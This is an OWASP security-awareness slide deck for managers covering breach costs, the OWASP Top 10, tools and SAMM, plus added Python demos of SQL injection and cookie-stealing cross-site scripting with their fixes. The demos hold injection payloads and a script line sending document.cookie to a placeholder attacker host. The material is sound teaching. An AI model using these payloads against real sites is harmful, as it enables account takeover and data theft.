The OWASP Foundation. OWASP Education, computer-based training: Security for Managers and Executives. Nishi Kumar, Systems Architect, FIS.

1 The OWASP Foundation, http://www.owasp.org
OWASP Education, computer-based training: Security for Managers and Executives
Nishi Kumar, Systems Architect, FIS; OWASP CBT Project Lead; Nishi.Kumar@owasp.org

2 How would you feel if your confidential data were stolen? Angry! Frustrated!

3 Facebook Phishing Attack
Lures people to a fake Facebook page and prompts them to log in. Unsuspecting Facebook users get a message from a friend urging them to "check this out", with a link to a web page that looks like the Facebook log-in page; credentials typed there go to the attacker.

4 Article from Wall Street & Technology (slide image)

5 Why Should We Care? Let's just think this through...
How likely is a successful web application attack?
Stunningly prevalent
Easy to exploit without special tools or knowledge
Little chance of being detected
Hundreds of thousands of developers, only a tiny fraction trained in security
Consequences?
Corruption or disclosure of database contents
Root access to web and application servers
Loss of authentication and access control for users
Defacement
Secondary attacks launched from your application

6 Cost of Non-Compliance
In the event of a breach the acquirer CAN make the merchant responsible for:
Any fines from PCI-Co, up to $500,000 per incident
Cost to notify victims
Cost to replace cards (about $10 per card)
Cost of any fraudulent transactions
Forensics from a QDSC
Level 1 certification from a QDSC
The QDSC (Qualified Data Security Company) certification by Visa authorizes a company to perform level-one onsite assessments for merchants and service providers that require a "Report on Compliance" (ROC).

7 Cost of Non-Compliance (cont.)
Example: 50,000 credit cards stolen
PCI penalty: $100,000 per incident; $500,000 if you do not have a self-assessment
Card replacement: $500,000 (50,000 x $10 per card)
Fraudulent transactions: $61,750,000 (50,000 x $1,235; $1,235 was the 2004 average fraudulent transaction)
Bad publicity: priceless!

8 Why is Web Application Security important? Attacks shift towards the application layer.
(Chart: % of attacks versus % of security spending across the network, server and web application layers. Roughly 75% of attacks target web applications but only 10% of security dollars are spent there, while the network layer draws 25% of attacks and 90% of spending. Two thirds of all web applications are vulnerable. Sources: Gartner, Watchfire.)

9 Problem Illustrated
Application layer: attacker sends attacks inside valid HTTP requests; your custom code is tricked into doing something it should not; security requires software development expertise, not signatures.
Network layer: firewall, hardening, patching, IDS and SSL cannot detect or stop attacks inside HTTP requests; security relies on signature databases.
(Diagram: an application attack, from an outsider or an insider, passes through the firewall, hardened OS, web server and app server into the custom code, and from there reaches the business functions (accounts, finance, administration, transactions, communication, knowledge management, e-commerce) and back-end systems: databases, legacy systems, web services, directories, human resources, billing.)

10 Demo attack: phases of a hacker attack

11 Phase 1 - Information Search: Fingerprinting
1. Hacker gathers information about the victim's target system: operating system, web server, database
2. Compares that information against a vulnerability database

12 Phase 1 - Information Search: SQL Injection
1. Hacker finds a vulnerability: searches for a (specific) user, finds additional information about that user
2. Needs this information for the next phase of the attack
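The SQL injection step described above, as an added example that is not part of the presentation or its demo application: a user search built by string concatenation next to the parameterised version, run against a constructed in-memory SQLite table (the user names, e-mail addresses and phone numbers are invented sample data).

```python
import sqlite3

# Constructed sample data standing in for the victim application's user
# table; none of it comes from the presentation's demo target.
SAMPLE_USERS = [
    ("alice", "alice@example.com", "555-0101", "user"),
    ("bob", "bob@example.com", "555-0102", "user"),
    ("victim", "victim@example.com", "555-0199", "admin"),
]


def build_db():
    """Create an in-memory SQLite database holding SAMPLE_USERS."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (name TEXT, email TEXT, phone TEXT, role TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def search_user_vulnerable(conn, name):
    """Vulnerable: the search term is spliced straight into the SQL text,
    so a quote in the input changes the structure of the query."""
    query = "SELECT name, email, phone FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def search_user_safe(conn, name):
    """Fixed: a bound parameter. The driver passes the value separately
    from the SQL text, so the input can never become part of the query."""
    query = "SELECT name, email, phone FROM users WHERE name = ?"
    return conn.execute(query, (name,)).fetchall()


def demo():
    conn = build_db()
    # Normal use: one matching row.
    normal = search_user_vulnerable(conn, "bob")
    # Tautology payload: the closing quote ends the string literal, OR 1=1
    # makes the WHERE clause always true, and "--" comments out the
    # dangling quote. Every user's contact details come back.
    dumped = search_user_vulnerable(conn, "x' OR 1=1 --")
    # UNION payload: reads a column the search page never displays (role),
    # which tells the attacker which account is worth targeting later.
    roles = search_user_vulnerable(
        conn, "x' UNION SELECT name, role, '' FROM users --"
    )
    # The same tautology payload against the parameterised query is just a
    # string nobody is called, so it matches nothing.
    safe = search_user_safe(conn, "x' OR 1=1 --")
    return normal, dumped, roles, safe


if __name__ == "__main__":
    normal, dumped, roles, safe = demo()
    print("normal search:", normal)
    print("tautology payload returned", len(dumped), "rows")
    print("union payload leaked roles:", roles)
    print("parameterised query with payload:", safe)
```

The fix is the bound parameter, not input filtering: `search_user_safe` accepts the payload as a literal value and simply finds no such user. The same pattern applies to any driver that offers placeholders (`?`, `%s`, `:name`), and the page's later advice on security code review is largely about finding the concatenated form.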

13 Phase 2 - Infrastructure: Cross Site Scripting (XSS)
1. Hacker has found personal information about the user: e-mail address, phone number, ...
2. Sends an e-mail with an unsuspicious topic
3. The e-mail carries a link with an XSS payload for the vulnerable site; when it runs in the user's browser it sends the user's session to the hacker's server

14 Phase 2 - Infrastructure: Cross Site Scripting (XSS)
1. User receives the e-mail
2. The e-mail looks unsuspicious to the user: plausible topic, plausible originator
3. The included XSS sends all of the user's cookies for the site to the hacker's web site

15 Phase 3 - Exploit: Session Hijacking
1. Hacker has received all of the user's cookies
2. Cookies are what the application uses to identify users
3. Hacker presents the cookie and resumes the user's session
4. Hacker is logged in as user "victim" with the victim's access rights
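Phases 2 and 3 above (cookie theft through reflected XSS, then replay of the stolen session cookie) as an added example, not code from the presentation or its demo site: a search page that echoes the query unescaped next to its escaped form, a constructed session store, and the cookie attributes that blunt the attack. The attacker host name is a placeholder and the session store is a plain dictionary standing in for server-side session state.

```python
import html
import secrets

# Constructed session store: session id -> username. Stands in for the
# application's server-side session state; the values are invented.
SESSIONS = {}


def login(username):
    """Start a session and return the id that goes into the cookie."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = username
    return sid


def whoami(cookie_header):
    """Identify the caller from a raw 'Cookie:' header value, exactly as
    the application does. Whoever presents the id is that user."""
    pairs = (part.strip().split("=", 1) for part in cookie_header.split(";"))
    cookies = dict(p for p in pairs if len(p) == 2)
    return SESSIONS.get(cookies.get("sid"))


def render_search_vulnerable(term):
    """Vulnerable: the search term is written into the page as-is, so a
    term containing markup becomes part of the page's HTML."""
    return "<h1>Results for " + term + "</h1>"


def render_search_safe(term):
    """Fixed: output encoding. The same term renders as visible text."""
    return "<h1>Results for " + html.escape(term, quote=True) + "</h1>"


# Payload of the kind the slides describe: delivered in a link in the
# e-mail, it runs on the vulnerable site's origin and ships the victim's
# cookies to the attacker's host (attacker.example is a placeholder).
COOKIE_THIEF = (
    '<script>new Image().src="http://attacker.example/c?"'
    "+encodeURIComponent(document.cookie)</script>"
)


def session_cookie_header(sid):
    """Set-Cookie line for the session id. HttpOnly keeps it out of
    document.cookie, so even a successful XSS cannot read it; Secure and
    SameSite restrict where the browser will send it."""
    return "Set-Cookie: sid=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % sid


def demo():
    victim_sid = login("victim")
    # Phase 2: the victim clicks the link; the vulnerable page embeds the
    # script, the fixed page shows it as harmless text.
    page_vuln = render_search_vulnerable(COOKIE_THIEF)
    page_safe = render_search_safe(COOKIE_THIEF)
    # Phase 3: the attacker replays the stolen cookie from their own
    # machine. No password is involved; the cookie is the identity.
    hijacked_as = whoami("sid=" + victim_sid)
    return page_vuln, page_safe, hijacked_as


if __name__ == "__main__":
    page_vuln, page_safe, hijacked_as = demo()
    print(page_vuln)
    print(page_safe)
    print("attacker is logged in as:", hijacked_as)
    print(session_cookie_header(login("victim")))
```

Two layers matter here. Output encoding (`html.escape`) removes the XSS itself; the `HttpOnly` attribute is defence in depth that stops `document.cookie` from exposing the session even when an escaping bug slips through. Neither helps once the cookie is already in the attacker's hands, which is why session ids should also be rotated on login and invalidated on logout.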

16 That was just the beginning

17 Demo: cross-site scripting, http://testasp.acunetix.com/Search.asp

18 Leverage OWASP for Web Application Security Training
The Open Web Application Security Project (OWASP Foundation Inc.)
Participation in OWASP is free and open to all
The vision is a software market that produces code that is secure
The mission is to make security visible, so that software buyers and sellers are on an equal footing and market forces can work
International not-for-profit charitable organization, funded primarily by volunteers' time and OWASP memberships
http://www.owasp.org

19 What are the Top 10 Vulnerabilities? The OWASP Top 10

20 Common Security Issues: The OWASP Top 10 2007, "The Ten Most Critical"
Aims to educate developers, architects and security practitioners about the consequences of the most common web application security vulnerabilities
Living document: the 2007 Top 10 differs from the 2004 Top 10
OWASP Top 10 2010 rc1 was just released at the AppSec DC 2009 conference

21 Users and Adopters
Payment Card Industry (PCI): PCI DSS requirements 6.5.1 to 6.5.10 are the OWASP Top 10; PA-DSS requirements 5.2.1 to 5.2.10 are the OWASP Top 10; security code review is required for all custom code
OWASP Supporters (slide image)

22 Common Security Issues: OWASP Top 10 2010 rc1, the 4th version of the Top 10, released last week at the OWASP AppSec DC 2009 conference

23 Security Threats and OWASP T10 Vulnerabilities
Phishing: exploits weak authentication, authorization, session management and input validation (XSS, XFS) vulnerabilities
Privacy violations: exploit poor input validation, business rule and weak authorization, injection flaws and information leakage vulnerabilities
Identity theft: exploits poor or non-existent cryptographic controls, malicious file execution, authentication, business rule and authorization check vulnerabilities

24 Security Threats and OWASP T10 Vulnerabilities (cont.)
System compromise, data alteration or data destruction: exploit injection flaws and remote file inclusion/upload vulnerabilities
Financial loss: exploits unauthorized transactions and CSRF attacks, broken authentication and session management, insecure direct object references, and weak authorization (forceful browsing) vulnerabilities
Reputation loss: depends on any evidence (not necessarily exploitation) of a web application vulnerability

25 OWASP Top Ten 2007 and ESAPI (Enterprise Security API)

26 OWASP Documentation on Web Application Security
Application Security Desk Reference (ASDR): basic reference material on application security terminology
Developer Guide: comprehensive guide to web application and web services security
Code Review Guide: comprehensive secure code review guide on the web
Testing Guide: web application penetration testing
ASVS: Application Security Verification Standard

27 OWASP Tools and Technology
Automated Security Verification: vulnerability scanners, static analysis tools, fuzzing
Manual Security Verification: penetration testing tools, code review tools
AppSec Libraries: ESAPI security architecture, ESAPI reference implementation, guards and filters
AppSec Management: secure coding, reporting tools
AppSec Education: flawed apps, learning environments, Live CD, SiteGenerator

28 Live CD
Project that collects some of the best open source security projects in a single environment
Users can boot from the Live CD and immediately start using all the tools without any configuration
http://www.owasp.org/index.php/LiveCD

29 OWASP Tools (on the Live CD)
OWASP WebScarab v20090122, OWASP WebGoat v5.2, OWASP CAL9000 v2.0, OWASP JBroFuzz v1.2, OWASP DirBuster v0.12, OWASP SQLiX v1.0, OWASP WSFuzzer v1.9.4, OWASP Wapiti v2.0.0-beta, Paros Proxy v3.2.13, nmap & Zenmap v4.76, Wireshark v1.0.5, tcpdump v4.0.0, Firefox 3.06 + 25 add-ons, Burp Suite v1.2, Grendel-Scan v1.0, Metasploit v3.2 (svn), w3af + GUI svn r2161, Netcats (original + GNU), Nikto v2.03, Fierce Domain Scanner v1.0.3, Maltego CE v2-210, Httprint v301, SQLBrute v1.0, Spike Proxy v1.4.8-4, Rat Proxy v1.53-beta

30 WebGoat: a classic deliberately vulnerable application used to teach developers about security code flaws

31 WebScarab, a proxy engine: a proxy tool to intercept and modify HTTP requests and responses between the browser and the application

32 Software Assurance Maturity Model (SAMM)
Disciplines: Alignment & Governance, Requirements & Design, Verification & Assessment, Deployment & Operations
The four Disciplines are high-level categories for activities
Three security Functions under each Discipline are the specific silos for improvement within an organization

33 Software Assurance Maturity Model (SAMM): check out this one... (slide image)

34 SAMM: Conducting assessments. SAMM includes assessment worksheets for each Security Practice

35 SAMM: Creating Scorecards
Gap analysis: capturing scores from detailed assessments versus expected performance levels
Demonstrating improvement: capturing scores from before and after an iteration of assurance program build-out
Ongoing measurement: capturing scores over consistent time frames for an assurance program that is already in place

36 Process perspective: build security into the SDLC

37 Since no customer is complaining, why does an organization need to fix security vulnerabilities in its applications?
Compliance
In case of a security breach: fines
Reputation loss: priceless

38 What do we do if our application is already in production and has missed that phase of security?
It's never too late and never too early. It is a continuous process...
Penetration testing and security code review are the key. We must fix security leaks and vulnerabilities.

40 What will help?
Leverage OWASP
Security code review: the value of mentoring is enormous
Application scanning and code scanning using static analysis tools
Make web application security part of the SDLC process
Secure code development training
Train QA to find security issues in the application

41 Make security part of the SDLC process
